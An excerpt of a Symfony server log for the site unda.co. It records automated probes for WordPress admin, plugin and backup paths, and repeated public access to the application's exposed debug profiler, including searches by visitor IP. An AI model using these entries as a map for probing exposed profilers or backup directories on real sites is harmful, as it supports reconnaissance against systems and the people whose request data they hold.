  6379. [2025-12-20 04:18:41] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6380. [2025-12-20 04:21:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6ac002","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6ac002?panel=config","method":"GET"} []
  6381. [2025-12-20 04:21:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6382. [2025-12-20 04:22:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/images/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/images/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6383. [2025-12-20 04:22:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6384. [2025-12-20 04:22:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6385. [2025-12-20 04:22:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mini" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mini\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6386. [2025-12-20 04:22:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6387. [2025-12-20 04:22:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6388. [2025-12-20 04:22:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6389. [2025-12-20 04:22:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6390. [2025-12-20 04:22:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6391. [2025-12-20 04:22:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6392. [2025-12-20 04:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6393. [2025-12-20 04:23:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6394. [2025-12-20 04:23:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6395. [2025-12-20 04:23:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6396. [2025-12-20 04:23:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6397. [2025-12-20 04:23:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6398. [2025-12-20 04:23:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6399. [2025-12-20 04:23:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6400. [2025-12-20 04:23:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6401. [2025-12-20 04:23:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6402. [2025-12-20 04:23:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6403. [2025-12-20 04:23:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6404. [2025-12-20 04:23:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6405. [2025-12-20 04:23:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/crop/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/crop/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6406. [2025-12-20 04:23:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6407. [2025-12-20 04:23:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6408. [2025-12-20 04:23:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6409. [2025-12-20 04:23:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6410. [2025-12-20 04:26:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6411. [2025-12-20 04:28:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6412. [2025-12-20 04:35:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  6413. [2025-12-20 04:35:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
  6414. [2025-12-20 04:47:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6415. [2025-12-20 04:50:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b8d5e3","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/b8d5e3/search/results?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
  6416. [2025-12-20 04:50:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
  6417. [2025-12-20 04:51:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=cache","method":"GET"} []
  6418. [2025-12-20 04:51:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6419. [2025-12-20 05:00:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a","method":"GET"} []
  6420. [2025-12-20 05:00:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6421. [2025-12-20 05:07:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3?panel=events","method":"GET"} []
  6422. [2025-12-20 05:07:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6423. [2025-12-20 05:08:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=validator","method":"GET"} []
  6424. [2025-12-20 05:08:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  6425. [2025-12-20 05:08:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6426. [2025-12-20 05:08:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6427. [2025-12-20 05:12:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=cache","method":"GET"} []
  6428. [2025-12-20 05:12:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6429. [2025-12-20 05:30:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6430. [2025-12-20 05:35:30] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1dc617","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/1dc617/search/results?limit=10&method=GET","method":"GET"} []
  6431. [2025-12-20 05:35:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  6432. [2025-12-20 05:40:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
